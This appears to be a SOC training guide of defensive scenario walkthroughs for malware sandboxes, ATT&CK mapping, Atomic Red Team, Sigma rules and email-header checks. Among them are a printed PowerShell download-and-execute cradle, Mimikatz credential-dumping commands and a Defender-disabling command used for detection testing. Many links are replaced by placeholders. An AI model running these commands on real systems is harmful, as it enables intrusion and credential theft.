Malware Behavioural Analysis)

Context

Event Type: Suspicious Email Attachment

Objective: Determine if the Excel file is malicious and understand its behaviour
Tool: [Link]

Step 1: Incident Trigger

A finance staff member reports a strange Excel file titled Invoice_9987.xlsx received from a
spoofed supplier email.
The user says the file asks to "enable content" (macros) to view the invoice.

Step 2: Upload File to [Link] Sandbox

Action:

1. Analyst logs into [Link]

2. Clicks New Task
3. Uploads Invoice_9987.xlsx
4. Enables Macro Execution
5. Starts the analysis session

Step 3: Observed Behaviour

During the analysis, [Link] reveals the following actions:

• Process Activity:
o [Link] launches
o Spawns [Link]
o PowerShell executes obfuscated command
• Network Activity:
o Outbound HTTP connection to [Link]
o Resolved via malicious-assets[.]cc domain
o Response code: 200 OK (file download successful)
• Dropped Files:
o C:\Users\Admin\AppData\Local\Temp\[Link]
o File hash: a88e3c7cfc8ad9312cda4e8e2a43a1a5
• Registry Modifications:
o Persistence via
HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UpdateSvc
• C2 Communication:
o [Link] attempts beaconing to [Link] via HTTP POST every 30
seconds
• Threat Classification:
o [Link] rates behaviour as suspicious (Threat Score: 9/10)
o MITRE Mapping:
§ T1059.001 (PowerShell Execution)
§ T1105 (Ingress Tool Transfer)
§ T1547.001 (Registry Run Key Persistence)
§ T1071.001 (Application Layer Protocol: Web Traffic)

Step 4: IOC Extraction

IOC Type Value

File Name Invoice_9987.xlsx
Dropper Domain malicious-assets[.]cc
IP Address [Link]
C2 Server [Link]
 Dropped File [Link]
File Hash a88e3c7cfc8ad9312cda4e8e2a43a1a5

Step 5: Response Actions

SOC Actions:

• Block all IOCs at the firewall, proxy and endpoint protection platforms
• Add hash to EDR blocklist
• Hunt for any process on endpoints that launched [Link] from Excel
• Disable macros org-wide unless digitally signed
• Review email filters for other instances of similar attachments

Threat Intelligence Team:

• Correlate the file hash with known threat actor tools

• Submit sample to VirusTotal and Hybrid Analysis for further reputation correlation
• Enrich threat intelligence platform with MITRE mappings and sandbox results

Step 6: Automation Recommendation

• Integrate [Link]’s API with the SOAR platform to auto-submit suspicious email
attachments for behavioural analysis
• Tag alerts with specific MITRE TTPs based on sandbox results
• Auto-block domains and IPs resolved by malware behaviour when [Link] confirms
threat
JOE SANDBOX

Joe Sandbox is an advanced malware analysis platform that supports multiple operating
systems and offers in-depth static and dynamic analysis. It generates comprehensive
reports detailing malware behaviour, memory manipulation, API calls and persistence
techniques.

Use Cases:

• Submit executables, documents, URLs or archives to observe system changes and

behaviour.
• Analyse obfuscated payloads or custom packers that evade traditional detection.
• Identify sandbox evasion techniques used by malware.
• View process execution graphs, MITRE ATT&CK mappings and API call traces.
• Integrate with SIEM or SOAR platforms to automate malware classification
workflows.

Practical Application: An analyst submits a suspicious MSI installer obtained from a

supply chain email. Joe Sandbox reveals the malware uses a custom packer, injects
into [Link], disables security controls and initiates DNS tunnelling. The analyst
extracts indicators and shares the report with the threat intel team.

Scenario Simulation: Investigating a Malicious Supply Chain Installer Using Joe

Sandbox

Context

Event Type: Suspicious MSI Installer

Objective: Analyse the behaviour of an unknown installer and uncover obfuscation or
evasion
Tool: Joe Sandbox

Step 1: Incident Trigger

An employee from the procurement team receives an unexpected MSI installer

(Vendor_Pricing_Tool.msi) from a known supplier’s email address.
The email claims the file contains an updated pricing application.

However, the supplier later confirms they did not send this email.

Step 2: Upload Sample to Joe Sandbox

Action:
 1. Analyst logs into Joe Sandbox Cloud
2. Submits Vendor_Pricing_Tool.msi
3. Selects Windows 10 (x64) analysis environment
4. Enables full dynamic and static analysis options
5. Starts scan

Step 3: Joe Sandbox Report Findings

Static Analysis:

• Packer Detected: Custom UPX-like wrapper with anti-debug strings

• Strings Analysis: Obfuscated PowerShell commands, DNS domains, encoded IPs
• Digital Signature: Invalid self-signed certificate, fake CN “Microsoft”

Dynamic Behaviour:

• Process Tree:
o [Link] spawns Vendor_Pricing_Tool.exe
o Spawns hidden [Link]
o Injects code into [Link]
• API Calls:
o Uses VirtualAllocEx, WriteProcessMemory and CreateRemoteThread for
injection
o Calls NetSh to disable Windows Defender’s real-time monitoring
• Network Behaviour:
o DNS queries to:
§ [Link][.]online
§ [Link][.]org
o Traffic pattern indicates DNS tunnelling (long subdomain strings, short TTL)
o No direct HTTP/S beaconing
• Persistence Mechanism:
o Drops script at:
§ C:\Users\Admin\AppData\Roaming\[Link]
o Adds key to:
§ HKCU\Software\Microsoft\Windows\CurrentVersion\Run
• MITRE ATT&CK Mapping:
o T1027 (Obfuscated Files or Information)
o T1055 (Process Injection)
o T1071.004 (Application Layer Protocol: DNS)
o T1547.001 (Registry Run Key Persistence)
o T1089 (Disable Security Tools)

Threat Score: 9.5/10 – High Confidence Malware

Step 4: IOCs Extracted

IOC Type Value

File Vendor_Pricing_Tool.msi
Dropped File [Link]
Injected Target [Link]
Domains [Link][.]online, [Link][.]org
Registry Key HKCU...\Run\winupdate
DNS Payload aHR0cDovL3VwbG9hZC5leGU= (Base64 Encoded)

Step 5: Response Actions

SOC Team:

• Block DNS and IP traffic related to *.msapi[.]online and *.syncstore[.]org

• Quarantine endpoints where file was downloaded
• Remove persistence entries and injected processes
• Add MSI hash to endpoint protection deny list
• Isolate potentially compromised user accounts

Threat Intelligence Team:

• Tag behaviour as “Custom Packer / DNS Tunnelling Malware”

• Upload indicators and full Joe Sandbox report to TIP platform
• Correlate with previous campaigns using similar DNS TTPs

Step 6: Automation and Integration

• Integrate Joe Sandbox API into SOAR to:

o Auto-submit new suspicious MSI and EXE files
o Trigger containment playbooks if behavioural score > 8
• Enrich SIEM alerts with Joe Sandbox verdicts and MITRE TTPs
CAPE V2 (CONFIG AND PAYLOAD EXTRACTION)

CAPE is an open-source malware sandbox framework focused on extracting malware

configurations and payloads during execution. It extends the Cuckoo Sandbox with
enhancements for handling malware families like Remcos, AgentTesla and RedLine
Stealer.

Use Cases:

• Extract embedded malware configurations such as C2 IPs, domains and keys.

• Run PE files, Office documents, scripts and archives to analyse payload delivery.
• Detect unpacking routines and post-exploitation behaviour.
• Automate reverse engineering of droppers and loaders.
• Use for batch submission of samples during malware outbreak investigations.

Practical Application: A suspicious PowerPoint file is submitted to CAPE V2. The

sandbox identifies embedded macros, drops a VBS file, executes it and extracts the
C2 domain from the binary. The config shows use of Remcos RAT with hardcoded
credentials, enabling rapid IOC creation.

Scenario Simulation: Extracting Malware Configuration Using CAPE V2

Context

Event Type: Suspicious Attachment Investigation

Objective: Extract C2 configuration and embedded payload
Tool: CAPE V2 (Config and Payload Extraction)
Platform: [Link]

Step 1: Incident Trigger

The SOC receives a report of a malicious PowerPoint (.pptx) file named

Invoice_Q3_Summary.pptx sent to multiple finance department users. The email subject
line is “Q3 Payment Breakdown.”

Step 2: Upload Sample to CAPE V2 Sandbox

Action:

1. Analyst logs into the internal CAPE V2 instance

2. Submits Invoice_Q3_Summary.pptx
3. Chooses Windows 10 x64 execution environment
4. Enables macro execution and full memory dump options
5. Initiates the analysis
Step 3: CAPE V2 Output

File Behaviour:

• Embedded Macro Detected in PowerPoint file

• Macro drops file [Link] to C:\Users\Admin\AppData\Roaming\
• VBS script executes hidden PowerShell:

powershell -w hidden -nop -c "IEX(New-Object

[Link]).DownloadString('[Link]

Payload Delivered:

• Downloaded [Link] is a disguised Remcos RAT executable

• Executed using [Link] /s /u /i:"" [Link]

Configuration Extracted by CAPE:

• C2 Address: [Link]:2404
• Campaign Tag: PayInv-Q3
• Mutex: remcos_mutex_xyz
• Credentials Found in Config:
o Username: sysadmin
o Password: Fx$23@rmc

Behavioural Observations:

• Keylogging modules initiated

• Remote desktop component active
• DNS and TCP beaconing to C2 every 15 seconds

Step 4: IOC Summary Table

IOC Type Value

File Name Invoice_Q3_Summary.pptx
Dropped Script [Link]
Payload [Link]
C2 IP [Link]:2404
Campaign PayInv-Q3
Mutex remcos_mutex_xyz
Credentials sysadmin / Fx$23@rmc
Domain Used alt-system[.]info

Step 5: Response Actions

SOC:

• Block C2 domain alt-system[.]info and IP [Link]

• Quarantine affected endpoints
• Revoke compromised domain accounts
• Search for mutex and dropped file ([Link]) in EDR and endpoint logs
• Add hash of [Link] to AV and SIEM blacklist

Threat Intelligence Team:

• Flag campaign as Remcos RAT - Q3 Invoice Bait

• Upload extracted config and payloads to threat intel platform
• Map findings to MITRE ATT&CK

Step 6: MITRE ATT&CK Mapping

Tactic Technique
Initial Access T1203 - Exploitation for Client Execution
Execution T1059.001 - PowerShell
Defense Evasion T1140 - Deobfuscate/Decode Files or Info
Command & Control T1071.001 - Web Protocols (HTTP)
Credential Access T1056.001 - Keylogging
Persistence T1547.001 - Registry Run Keys

Step 7: Automation Recommendation

• Integrate CAPE V2 with internal SOAR to:

o Auto-submit suspicious files from email gateway
o Extract and enrich IOC metadata
o Create automatic blocking rules based on extracted C2s and payloads
HYBRID ANALYSIS

Hybrid Analysis is a free sandboxing service provided by Falcon Sandbox (acquired by

CrowdStrike) that performs static and dynamic analysis on files and URLs. It provides a
threat score, system behaviour logs, network traffic and relationships with known
malware.

Use Cases:

• Analyse attachments, executables and URLs submitted from user reports or alert
investigations.
• Determine threat level using the community score and malware family tags.
• Observe network indicators, DNS resolutions, dropped files and command
executions.
• Link samples to known campaigns or malware families through similarity scoring.
• Export MITRE ATT&CK technique mappings for incident response.

Practical Application: A SOC team detects an unusual executable on an endpoint.

They upload the file to Hybrid Analysis, which shows network activity toward multiple
domains and attempts to steal clipboard content. The sample is linked to Lokibot,
confirming data theft activity.

Scenario Simulation: Malware Behavioural Analysis Using Hybrid Analysis

Context

Event Type: Suspicious Executable Found on Endpoint

Objective: Determine malware behaviour and identify threat family
Tool: Hybrid Analysis ([Link]

Step 1: Initial Trigger

EDR on a finance department workstation detects the presence of an executable file

named [Link] in the user's Downloads folder. The file was downloaded after
the user opened an email titled “Monthly Payment Tracker”.

Step 2: Upload the Sample to Hybrid Analysis

Analyst Actions:

1. Accesses [Link]
2. Logs in with analyst account
3. Uploads [Link]
4. Chooses Windows 10 x64 environment and sets analysis timeout to 5 minutes
 5. Enables network simulation and process interaction

Step 3: Analysis Results

Hybrid Analysis Summary:

• Threat Score: 92/100 (High)

• Tags: Stealer, Keylogger, Clipboard Monitor, Network Beaconing
• Malware Family: Lokibot
• File Hash: c8e75f3c1f321a... (SHA256)
• Sample URL: [Link]

Behavioural Observations:

Category Details
Process Creation Spawns [Link], then [Link] silently
Clipboard Access Reads clipboard content containing credentials
Dropped Files Creates [Link] in %AppData%
Network Traffic POST requests to hxxp://login-checker[.]online/[Link]
Registry Changes Adds persistence via HKCU\Software\Microsoft\Windows\Run
DNS Queries login-checker[.]online, [Link][.]cc, check-port[.]org

Step 4: MITRE ATT&CK Mapping

Tactic Technique
Initial Access T1204.002 - Malicious File
Execution T1059.001 - PowerShell
Persistence T1547.001 - Registry Run Keys
Credential Access T1056.001 - Input Capture
Command & Control T1071.001 - Web Protocols (HTTP/S)
Collection T1115 - Clipboard Data

Step 5: IOC Summary Table

IOC Type Value

File Name [Link]
SHA256 c8e75f3c1f321a...
C2 Domain login-checker[.]online
Dropped File [Link]
Persistence Key HKCU\...\Run\svchost-update
DNS Observed [Link][.]cc, check-port[.]org

Step 6: Response Actions

SOC Team:

• Immediately isolate affected host

• Revoke session tokens and reset credentials for the user
• Block all listed domains in firewall and DNS filtering
• Search for presence of dropped file hash in SIEM and EDR telemetry
• Apply YARA rule based on PowerShell usage and persistence keys

Threat Intelligence Team:

• Tag IOC set as “Lokibot – August Phishing”

• Add Hybrid Analysis report to internal threat knowledge base
• Share threat report with external ISAC

Step 7: Automation & Integration Tips

• Use Hybrid Analysis API to automatically:

o Submit files extracted from suspicious emails
o Parse returned report JSON for IOC extraction
o Auto-populate SIEM/Threat Intel Platform with IOC tags and severity
INQUEST LABS

InQuest Labs offers a malware analysis sandbox and file dissection tools tailored for
email-borne threats. It focuses on extracting embedded threats in documents and emails,
analysing payloads and identifying obfuscated content.

Use Cases:

• Analyse suspicious email attachments like PDFs, Office documents or ZIP files.
• Decompose nested files and scripts to reveal embedded URLs or payloads.
• Observe file behaviour to identify macro execution, file drops and beaconing.
• Detect evasive techniques used in targeted phishing campaigns.
• Enrich threat intelligence with decoded content and static indicators.

Practical Application: During a spear-phishing campaign investigation, an analyst

uploads a ZIP attachment to InQuest Labs. It contains a multi-layered obfuscated
Excel file. The sandbox reveals a hidden macro that drops an EXE and connects to a
known Cobalt Strike C2, triggering an immediate threat response.

Scenario Simulation: Dissecting Email-Borne Malware Using InQuest Labs

Context

Event Type: Spear-phishing Investigation

Objective: Analyse a suspicious ZIP email attachment for embedded threats
Tool: InQuest Labs ([Link]

Step 1: Initial Trigger

A VIP user reports receiving a targeted email with the subject line: "Urgent: Financial Audit
Update". The email contains an attachment named Audit_Report_Q3.zip.

Step 2: Upload Sample to InQuest Labs

Analyst Actions:

1. Accesses [Link]
2. Uploads the suspicious ZIP file Audit_Report_Q3.zip
3. Enables file dissection, macro detection and threat intelligence correlation features
4. Tags the submission for internal case tracking (e.g. case#2025-014-EXE-PHISHING)

Step 3: File Dissection and Static Inspection

Results:
 • The ZIP file contains a heavily obfuscated Excel document named Audit-
[Link]
• Static analysis reveals:
o AutoOpen macro enabled
o Hex-encoded payload embedded in cell comments
o Base64 strings in hidden worksheet cells

Step 4: Dynamic Behavioural Analysis

Sandbox Behaviour:

• Upon execution:
o Macro runs [Link] with an obfuscated command
o Drops [Link] in %Temp%
o Attempts outbound HTTP connection to hxxp://updatemgr[.]info/agent
o Uses TLS with self-signed cert, suggesting beaconing via HTTPS

Memory Dump and Observations:

• Code injection into [Link]

• C2 server confirmed to be part of known Cobalt Strike beacon infrastructure
• Attempts to disable Windows Defender via PowerShell command

Step 5: Threat Attribution and TTPs

Tactic Technique
Initial Access T1204.002 - User Execution: Malicious File
Execution T1059.001 - PowerShell
Persistence T1547.001 - Registry Run Key
Defense Evasion T1089 - Disabling Security Tools
Command & Control T1071.001 - Application Layer Protocol: Web Traffic
Discovery T1083 - File and Directory Discovery

Step 6: IOC Summary Table

IOC Type Value

File Name Audit_Report_Q3.zip
Extracted File [Link]
Dropped File [Link]
C2 Domain updatemgr[.]info
PowerShell IOC -EncodedCommand aQBlAHgAcAAtAA==
Hash (EXE) d4f28f3b1a... (SHA256)

Step 7: Response Actions

SOC Team:

• Isolates user workstation

• Scans for presence of [Link] across environment
• Blocks C2 domain updatemgr[.]info at firewall and proxy
• Pushes IOC list into EDR and SIEM detection rules

Threat Intel Team:

• Tags case as “CobaltStrike via Email Phish”

• Uploads decoded samples and config to internal repository
• Shares threat report with MSSP partners

Step 8: Automation Recommendation

• InQuest Labs API integration with:

o Email Gateway: Auto-scan ZIP/PDF attachments in high-risk emails
o SOAR Platform: Enrich phishing alerts with dissected content
o SIEM Correlation: Alert when file hash or URL from InQuest reports are seen
in logs
5. MITRE ATT&CK MAPPING AND
CONTEXTUALISATION
THREATPURSUIT VM

ThreatPursuit VM is a Windows-based virtual machine designed for threat hunting and

adversary emulation. It comes preloaded with tools and datasets for blue teams to
investigate threats, test detections and map attack techniques to MITRE ATT&CK.

Use Cases:

• Perform hands-on threat hunting and malware analysis in a pre-configured lab

environment.
• Test detection rules or incident response workflows using real-world malware
samples and logs.
• Simulate attacker behaviours to understand how techniques align with ATT&CK
tactics.
• Use built-in tools like Sysmon, KAPE, Velociraptor and ATT&CK Navigator for
enriched investigations.

Practical Application: A SOC analyst uses ThreatPursuit VM to simulate credential

dumping using Mimikatz. The telemetry generated is mapped to ATT&CK T1003 and the
analyst tests whether their SIEM rules detect the activity accurately. The result is
used to improve EDR alerts and detection coverage.

Scenario Simulation: Credential Dumping Simulation and Detection Using

ThreatPursuit VM

Context

Event Type: Blue Team Threat Simulation & Detection Validation

Objective: Simulate credential dumping using real-world tools and verify SIEM/EDR
detection
Tool: ThreatPursuit VM ([Link]

Step 1: Environment Setup

SOC Analyst Actions:

• Boots up the ThreatPursuit VM (Windows 10) with the following preinstalled:

o Sysmon with custom config
o KAPE
o Velociraptor
 o ATT&CK Navigator
o Sigma rules
o Mimikatz
o Process Monitor

The VM is connected to a lab SIEM to collect logs from Sysmon and Windows Event Logs.

Step 2: Adversary Emulation – Credential Dumping

Execution:

1. The analyst opens Command Prompt with administrator privileges.

2. Executes:

[Link]
privilege::debug
sekurlsa::logonpasswords

3. Mimikatz attempts to dump credentials stored in LSASS memory.

Step 3: Log Generation

Telemetry from Sysmon:

Event Description Data Captured

ID
1 Process [Link] spawned by [Link]
creation
10 Process access [Link] accessed [Link] with
PROCESS_ALL_ACCESS
7 Image loaded DLLs loaded for interacting with Windows APIs
11 FileCreate Temporary files dropped during execution

Windows Security Logs:

• Event ID 4688 (New Process Creation)

• Event ID 4673 (Privileged Service Called)

Step 4: Mapping to MITRE ATT&CK

Detected Techniques:

Tactic Technique Name Technique ID

Credential Access Credential Dumping T1003
 Defense Evasion Obfuscated Files/Scripts T1027
Execution Command and Scripting T1059

Using ATT&CK Navigator on the VM, the analyst maps the behaviour and updates the
detection matrix.

Step 5: Detection Validation in SIEM

SIEM Query:

index=windows_logs (process_name="[Link]" OR
command_line="*sekurlsa::logonpasswords*")

Detection triggered:

• Alert: "Credential Dumping Detected – Mimikatz Activity"

• Log Source: ThreatPursuit VM
• Rule: Sigma Rule – Mimikatz Execution Detected

EDR Feedback:

• Alert raised in parallel due to memory access to [Link]

Step 6: Action and Coverage Improvement

SOC Outcome:

• SIEM detection rule verified and refined

• Telemetry from ThreatPursuit VM used to tune false positives
• Detection rule tagged with MITRE T1003
• Rule pushed into production SOC environment

Documentation Updated:

• Threat simulation report created

• ATT&CK coverage matrix updated
• Recommendations made to enhance correlation with other credential access TTPs
ATT&CK WORKBENCH

ATT&CK Workbench is a tool developed by MITRE that allows analysts to create, customise
and manage private versions of the ATT&CK knowledge base. It supports extending and
mapping internal threat data to MITRE techniques, building local threat models and linking
detections to adversary behaviours.

Use Cases:

• Create custom techniques, sub-techniques or notes for organisation-specific

threats.
• Map IOCs, alerts or incident data to ATT&CK techniques for structured reporting.
• Maintain an internal, version-controlled threat model aligned with your
environment.
• Use as a central repository for TTP tracking across incidents and red team
exercises.

Practical Application: After analysing an incident involving PowerShell misuse, a blue

team analyst uses ATT&CK Workbench to map the attacker’s behaviour to T1059.001
(PowerShell). They then add a note linking the detection rule, playbook response and
MITRE mapping for use in future playbooks and SOC documentation.

Scenario Simulation: Custom Threat Mapping Using ATT&CK Workbench

Context

Event Type: Post-Incident Threat Mapping

Objective: Map attacker behaviour to MITRE ATT&CK techniques using ATT&CK Workbench
Tool: ATT&CK Workbench ([Link]

Step 1: Incident Trigger

A SOC analyst investigates a confirmed incident where an attacker used a malicious Excel
macro to execute encoded PowerShell commands. The attack bypassed basic antivirus
and exfiltrated data via HTTP POST requests.

Step 2: Extract Observables

Collected IOCs and Behaviours:

• [Link] (delivered through Excel)

• PowerShell command with base64 payload
• Network beaconing to malicious-api[.]com/upload
• File access to C:\Users\Public\[Link]
 • HTTP POST to exfiltrate data

Step 3: Map to MITRE ATT&CK Using ATT&CK Workbench

The analyst opens ATT&CK Workbench and creates a new Threat Report Object titled:
Incident - 2025-08-05 - Excel Macro + PowerShell + Exfiltration

Techniques Mapped:

Technique Technique Name Details Logged

ID
T1059.001 Command and Scripting PowerShell command with base64
Interpreter: PowerShell string decoded at runtime
T1204.002 User Execution: Malicious File Excel file with embedded macro
delivering the payload
T1560.001 Archive Collected Data: Archive Sensitive files zipped before exfiltration
via Utility
T1041 Exfiltration Over C2 Channel HTTP POST exfiltration observed to
malicious domain
T1113 Screen Capture PowerShell payload also included
screenshot capture
T1070.004 Indicator Removal on Host: File Macro script deleted evidence post-
Deletion execution

Step 4: Custom Notes and Enrichment

The analyst uses ATT&CK Workbench to:

• Add custom notes under T1059.001 linking the detection rule used in the SIEM.
• Attach the SOAR playbook name executed in response.
• Create a new Relationship Object linking:
o Detection Rule ID: SPLNK-PWSH-B64-001
o Response Playbook: Playbook_Incident_PowerShell_Exfil
o Tool used: [Link] (for URL detonation and confirmation)

Step 5: Version-Controlled Threat Knowledge Base

ATT&CK Workbench allows this threat object to be saved as part of a local ATT&CK
dataset, enabling:

• Review during purple team exercises

• Alignment of detection engineering efforts
• Visibility into evolving TTPs used against the organisation
Step 6: SOC Integration

SOC Outcome:

• Future incidents with similar behaviour are auto-tagged as ATT&CK-MATCH:

PowerShell Exfiltration
• Detection rule updated with MITRE tag T1059.001
• Playbook decision logic tied to ATT&CK matrix mapping
• Threat knowledge centralised and shareable within internal blue team wiki
ATOMIC RED

Atomic Red Team is a library of simple, modular adversary emulation tests based on the
MITRE ATT&CK framework. These tests simulate attacker behaviours to validate defensive
controls and detection capabilities.

Use Cases:

• Run controlled tests that replicate specific ATT&CK techniques (e.g., lateral
movement, persistence).
• Evaluate SIEM and EDR detection accuracy across multiple ATT&CK tactics.
• Train SOC analysts on recognising the artefacts of real-world attack behaviours.
• Integrate tests into CI/CD or purple team automation for ongoing detection
validation.

Practical Application: A detection engineer wants to test coverage for ATT&CK

technique T1055 (Process Injection). They execute the relevant Atomic Red Team test
and observe whether their XDR and SIEM log the event properly. If telemetry is
missing, log collection and parsing rules are updated.

Scenario Simulation: Validating SOC Detection Coverage Using Atomic Red Team

Context

Objective: Evaluate and validate detection coverage for process injection (MITRE ATT&CK
T1055) using Atomic Red Team
Tool: Atomic Red Team ([Link]
Environment: Windows 10 with Sysmon + Elastic SIEM

Step 1: Setup and Pre-Check

Pre-requisites:

• Atomic Red Team repository cloned

• PowerShell execution policy set to allow local scripts
• Detection environment: Sysmon + Winlogbeat → Logstash → Elasticsearch → Kibana
• ATT&CK Navigator used to visualise gaps

Command Used:

Invoke-AtomicTest T1055 -TestNumbers 1

This executes a simulated Process Injection using PowerShell and Windows API calls to
mimic malicious injection behaviour.
Step 2: Activity and Observables

Behaviour:

• A benign process (e.g., [Link]) is launched

• A secondary script injects code into it
• Sysmon logs:
o Process access (Event ID 10)
o Memory write attempts (Event ID 10)
o DLL loads (Event ID 7)

Expected Telemetry:

Source Event ID Description

Sysmon 1 Process Create (atomic runner script)
Sysmon 7 DLL Load
Sysmon 10 Process Access - injection indicators
Defender - Possibly suppressed (test EICAR-safe)
XDR Agent - Alerts on abnormal process injection

Step 3: Detection Validation in SIEM

Query Used (KQL in Kibana):

[Link]: "10" and [Link]: "[Link]" and [Link]: "*inject*"

Result:

• No logs were returned

• Manual review shows Winlogbeat was not parsing Sysmon Event ID 10 correctly

Step 4: Response and Improvement

Action Taken:

• Logbeat config updated to include missing Event IDs

• Parser rules adjusted for custom field mapping
• Re-ran the test with:

Invoke-AtomicTest T1055 -TestNumbers 1 -GetPrereqs -Cleanup

New Result:

• Alert generated in Elastic under custom rule SIGMA - Suspicious Process Injection
 • Mapped to MITRE T1055 with enrichment tags

Step 5: Documentation and Mapping

Using ATT&CK Navigator, the detection is now marked GREEN under:

Technique ID Technique Name Notes

T1055 Process Injection Detection rule validated with ART test

Playbook Updated:

• Added detection rule ID and associated telemetry source

• Linked to response automation for privilege escalation investigation
SIGMA HQ

Sigma HQ is the official repository and development hub for Sigma rules, a generic
signature format that allows analysts to write SIEM-agnostic detection rules mapped to
MITRE ATT&CK techniques.

Use Cases:

• Write and use threat detection rules across various log sources (e.g., Windows
Event Logs, Sysmon, firewall logs).
• Map detections to ATT&CK techniques for structured threat detection coverage.
• Translate Sigma rules into SIEM-specific query formats using tools like sigmac.
• Standardise detection logic and ensure portability across different platforms.

Practical Application: A detection engineer creates a Sigma rule to detect attempts to

disable Windows Defender. The rule is mapped to ATT&CK T1562.001 (Impair
Defenses: Disable or Modify Tools). Using sigmac, the rule is converted into a Splunk
query and deployed into production with proper alerting logic.

Scenario Simulation: Writing and Deploying a Sigma Rule for Threat Detection

Context

Objective: Detect any attempt to disable Microsoft Defender via command-line tools
Tool: Sigma HQ + sigmac (converter)
Technique: MITRE ATT&CK T1562.001 – Impair Defenses: Disable or Modify Tools
SIEM Target: Splunk

Step 1: Create a Sigma Rule

The detection engineer writes the following Sigma rule (defender_disable.yml):

title: Windows Defender Disabling via Command Line

id: d5f2d0b3-9bdf-441a-9210-e11b2ec8a0f5
status: experimental
description: Detects command-line attempts to disable Microsoft Defender
author: Izzmier
date: 2025/08/05
references:
- [Link]
logsource:
category: process_creation
product: windows
detection:
 selection:
CommandLine|contains:
- "Set-MpPreference"
- "-DisableRealtimeMonitoring"
- "[Link]"
- "-RemoveDefinitions"
condition: selection
fields:
- CommandLine
- ParentImage
- Image
level: high
tags:
- attack.defense_evasion
- attack.t1562.001

Step 2: Convert the Rule to Splunk

Using sigmac:

sigmac -t splunk -c tools/config/[Link] defender_disable.yml >

defender_disable_splunk.txt

Generated Splunk Query:

(CommandLine="*Set-MpPreference*" OR CommandLine="*-
DisableRealtimeMonitoring*" OR CommandLine="*[Link]*" OR
CommandLine="*-RemoveDefinitions*")

Step 3: Deploy to SIEM

• The detection engineer logs into Splunk.

• The query is added under a scheduled search titled “[DETECT] Defender Disabling
Attempt”
• Alert threshold: > 0 per 5 minutes
• Email alert + SOAR webhook integration triggered if matched

Step 4: Test and Simulate

Test Command (lab environment):

Set-MpPreference -DisableRealtimeMonitoring $true

Sysmon Event Logged:

 Field Value
Image [Link]
CommandLine Set-MpPreference -DisableRealtimeMonitoring $true
ParentImage [Link]

Splunk Detection:

• Alert fires within 10 seconds

• Linked to MITRE ATT&CK ID: T1562.001

Step 5: SOC Playbook Integration

• Playbook updated to include:

o Isolation check for the host
o Endpoint EDR validation
o Analyst review for potential post-exploitation
• Mapping logged in ATT&CK Workbench under Defender Evasion Patterns
6. EMAIL HEADER AND PHISHING ANALYSIS
[Link]

[Link] is an email reputation and risk assessment API that analyses email addresses
for trustworthiness based on factors like domain age, breach history, deliverability and
malicious activity. It provides a fast and data-driven way to evaluate whether an email is
suspicious.

Use Cases:

• Validate sender email addresses during phishing or business email compromise

(BEC) investigations.
• Integrate with SOC platforms or phishing workflows to auto-flag risky email
addresses.
• Identify newly registered domains or emails involved in spam or scams.
• Check if an email has been seen in data breaches, spam traps or threat feeds.

Practical Application: A suspicious email is reported by an employee. The analyst

checks the sender’s email on [Link] and sees it has a “high-risk” score, is
associated with a recently registered domain and appears in multiple spam lists. The
incident is escalated as a targeted phishing attempt.

Scenario Simulation: Email Reputation Check Using [Link]

Context

Event Type: Phishing Email Report

Objective: Determine the trust level and risk profile of a suspicious email address
Tool: [Link]
Technique: Email Reputation Scoring, Domain Intelligence, Threat List Lookup

Step 1: Initial Trigger

A finance team employee receives a suspicious email from:

ceo-secure@[Link]

The email urges immediate action for wire transfer approval. The sender claims to be the
CEO using a different domain.

Step 2: Query [Link]

The analyst opens [Link] or uses the API:

curl [Link]

Response Output:

{
"email": "ceo-secure@[Link]",
"reputation": "high-risk",
"suspicious": true,
"references": 7,
"blacklisted": true,
"malicious_activity": true,
"domain_exists": true,
"domain_age_days": 3,
"new_domain": true,
"deliverable": true,
"credentials_leaked": false,
"data_breach": false,
"spam": true,
"spoofable": true,
"malicious": true,
"summary": [
"domain is newly registered",
"email seen in spam traps",
"associated with phishing attempts",
"blacklisted on multiple threat feeds"
]
}

Step 3: Analysis & Correlation

• Domain Age: 3 days old → suspicious for business impersonation

• Blacklisted: Confirmed on public spam threat feeds
• Spoofing Risk: SPF/DKIM records missing
• Malicious Flag: Set to true based on correlated behaviour and threat lists

Step 4: SOC Response Actions

• Analyst tags this as a BEC Attempt

• Email and domain added to blocklists in secure email gateway
• Email headers extracted and added to IOC tracking
• A case is created in the incident response platform
• Notification sent to the finance team to raise awareness of impersonation tactics

Step 5: Automation Recommendation

SOC recommends integrating [Link] into the phishing SOAR playbook:

• Automatically query sender addresses in user-reported suspicious emails

• Flag "new_domain + high-risk" combinations for escalation
• Add API score results to phishing triage enrichment
MXTOOLBOX

MXToolbox is a suite of tools that focuses on email and DNS infrastructure analysis. It
allows analysts to query email headers, verify SPF/DKIM/DMARC records, inspect
blacklists and test mail server configurations.

Use Cases:

• Parse and analyse full email headers to determine the actual sender and mail flow
path.
• Validate SPF, DKIM and DMARC configurations of sender domains to detect
spoofing.
• Check if a sender’s mail server IP is on known blacklists.
• Conduct WHOIS and DNS lookups on suspicious email domains.

Practical Application: A reported email claims to be from a partner company.

MXToolbox reveals that the domain fails SPF and DMARC checks and the IP is listed
on a spam blacklist. The analyst determines the email was spoofed and blocks the
domain at the gateway.

Scenario Simulation: Email Header and Domain Validation Using MXToolbox

Context

Event Type: Partner Email Spoofing Attempt

Tool: MXToolbox
Objective: Verify sender authenticity, inspect email header path, SPF/DKIM/DMARC status
and blacklist listings

Step 1: Suspicious Email Reported

A procurement staff receives an email supposedly from:

finance@[Link]

Subject: “Urgent Invoice Update – New Bank Account”

Step 2: Extract and Analyse Email Header

The SOC analyst pastes the full header into MXToolbox’s Header Analyzer tool.

Output:

• Return-Path: finance@[Link]
 • Received From: [Link] ([Link])
• SPF Check: Fail
• DKIM Check: Missing
• DMARC Policy: None
• Spam Score: High

Step 3: Validate Domain Infrastructure

Analyst runs the following checks:

• Blacklist Check: IP [Link] is listed on multiple spam DNSBLs

• SPF Lookup:

v=spf1 -all

The domain rejects all senders — yet the email passed through → spoofing confirmed

• DMARC:

No DMARC record found

Step 4: DNS & WHOIS Analysis

Using MXToolbox WHOIS & DNS tools:

• Domain [Link] is legit, but the email did not come from its
infrastructure
• WHOIS confirms original domain is registered to a real supplier
• DNS resolution shows the sending IP doesn't match authorised servers

Step 5: Analyst Action Plan

• Flag email as spoofed

• Add sender IP [Link] to blocklist
• Notify gateway administrator to enforce SPF/DKIM checks strictly
• Send alert to all users about ongoing vendor impersonation phishing
• Contact the legitimate supplier to inform them of the abuse of their domain
HAVEIBEENPWNED

